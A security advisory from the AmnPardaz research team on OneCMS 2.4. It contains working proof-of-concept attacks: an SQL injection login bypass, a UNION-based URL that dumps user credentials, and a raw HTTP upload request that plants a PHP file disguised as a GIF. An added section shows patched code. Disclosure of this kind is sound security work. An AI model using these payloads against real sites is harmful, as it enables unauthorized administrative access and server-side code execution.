########################## WwW.BugReport.ir ##########################
#
# AmnPardaz Security Research Team
#
# Title: OneCMS Vulnerabilities
# Vendor: http://www.insanevisions.com
# Bugs: SQL Injection (Authentication bypass), Arbitrary file upload!
# Vulnerable Version: 2.4 (prior versions also may be affected)
# Exploitation: Remote with browser
# Fix Available: No!
######################################################################
####################
- Description:
####################
Quote from vendor: "OneCMS is an Open Source CMS also released under
GPL allowing users to run their own game site easily.
From the powerful template system to top-notch support, OneCMS is a
great option for gaming sites."
####################
- Vulnerability:
####################
+-->Multiple SQL Injection vulnerabilities (authentication bypass)
Code Snippet:
a_login.php, lines 5-12:
    if ($_GET['login'] == "yes") {
        $usernameb = strip_tags(stripcslashes($_POST['username']));
        $passwordc = $_POST['password'];
        $passwordb = md5($passwordc);
        // $usernameb is concatenated straight into the query string
        $sql = mysql_query("SELECT * FROM onecms_users WHERE username = '".$usernameb."' AND password = '".$passwordb."'");
        $login_check = mysql_num_rows($sql);
$usernameb is interpolated into the query without escaping, and stripcslashes()
removes any backslashes that magic_quotes_gpc would have added, so a remote
attacker can bypass the login form regardless of the magic quotes setting!
POC:
Username: admin' or 1=1 /*
Password: something
Afterwards the program redirects the user to another location via header()
(this behaviour produces a redirect loop), but it is still possible to
perform administrative tasks such as file upload!
------------------------------------
Code Snippet:
staff.php, lines 30-31:
    // $_GET['user'] goes into the query unescaped
    $result = mysql_query("SELECT * FROM onecms_profile WHERE username = '".$_GET['user']."'");
    $profile = mysql_fetch_row($result);
POC:
http://localhost/OneCMS_v2.4/staff.php?user=aaa' union select 1,username,password,1,1,1,1,1,1,1,1,1,1 from onecms_users/*
Condition: magic_quotes_gpc = Off
+--> Arbitrary file upload!
Code Snippet:
a_upload.php, lines 472-475:
    if ($_FILES["ss_$i"]["name"]) {
        // only the client-supplied Content-Type is checked
        if (((((($_FILES["ss_$i"]["type"] == "image/jpeg") or ($_FILES["ss_$i"]["type"] == "image/gif") or ($_FILES["ss_$i"]["type"] == "image/bmp") or ($_FILES["ss_$i"]["type"] == "image/png") && ($_FILES["ss_$i"]["type"])))))) {
            // file is stored under its original client-supplied name
            copy ($_FILES["ss_$i"]["tmp_name"], "$path/".$_FILES["ss_$i"]["name"]."");
As shown above, the only check is on the Content-Type header, which the client
controls, and the file is saved under its original name. It is therefore
possible to upload arbitrary files (e.g. .php) by declaring an image/gif
content type, and the script accepts them as valid image files!
POC:
POST /OneCMS_v2.4/a_upload.php?view=add2 HTTP/1.0
Cookie: username=admin'or 1=1/*; password=96e79218965eb72c92a549dd5a330112; login_date=1199693273; style=Trend
-----------------------------7d84115025c
Content-Disposition: form-data; name="ss_1"; filename="C:\path\to\file\test.php"
Content-Type: image/gif
<?
phpinfo();
?>
-----------------------------7d84115025c
Content-Disposition: form-data; name="ss2_1"
-----------------------------7d84115025c
Content-Disposition: form-data; name="type_1"
image
-----------------------------7d84115025c
Content-Disposition: form-data; name="muche"
1
-----------------------------7d84115025c
Content-Disposition: form-data; name="Submit"
Upload
-----------------------------7d84115025c--
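For comparison, the following is an added illustration (not OneCMS code) of how the two checks above, the login query in a_login.php and the screenshot upload in a_upload.php, look when the user input is bound as a parameter and the upload is validated by content rather than by the client's Content-Type. The connection $db, the directory $path and the function names check_login/store_screenshot are assumptions for the example.

```php
<?php
// Added example, not part of OneCMS. Assumes a mysqli connection $db and an
// upload directory $path (hypothetical names) that the web server does not
// execute scripts from.

// 1. Login: parameters are bound, so quote characters in the username cannot
//    change the structure of the query (no dependence on magic_quotes_gpc).
function check_login(mysqli $db, string $username, string $password): bool {
    $stmt = $db->prepare(
        "SELECT COUNT(*) FROM onecms_users WHERE username = ? AND password = ?");
    // md5() kept only to match the existing onecms_users schema.
    $hash = md5($password);
    $stmt->bind_param('ss', $username, $hash);
    $stmt->execute();
    $stmt->bind_result($count);
    $stmt->fetch();
    $stmt->close();
    return (int)$count > 0;
}

// 2. Upload: $_FILES[...]['type'] and ['name'] are client-supplied and never
//    consulted for the decision. The bytes are parsed with getimagesize(), the
//    extension is derived from the detected type, and the name is generated
//    server-side, so a file named test.php can never land in $path as .php.
function store_screenshot(array $file, string $path): ?string {
    if ($file['error'] !== UPLOAD_ERR_OK || !is_uploaded_file($file['tmp_name'])) {
        return null;
    }
    $allowed = ['image/jpeg' => 'jpg', 'image/gif' => 'gif',
                'image/png'  => 'png', 'image/bmp' => 'bmp'];
    $info = @getimagesize($file['tmp_name']);
    if ($info === false || !isset($allowed[$info['mime']])) {
        return null;                       // not a real image of an allowed type
    }
    // A valid image can still carry PHP code after the image data (polyglot);
    // the forced extension and the non-executing directory are what stop that.
    $name = bin2hex(random_bytes(8)) . '.' . $allowed[$info['mime']];
    if (!move_uploaded_file($file['tmp_name'], "$path/$name")) {
        return null;
    }
    return $name;
}
```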
####################
- Credit :
####################
Original Advisory: http://www.bugreport.ir/?/26
AmnPardaz Security Research Team
Contact: admin[4t}bugreport{d0t]ir
WwW.BugReport.ir
WwW.AmnPardaz.com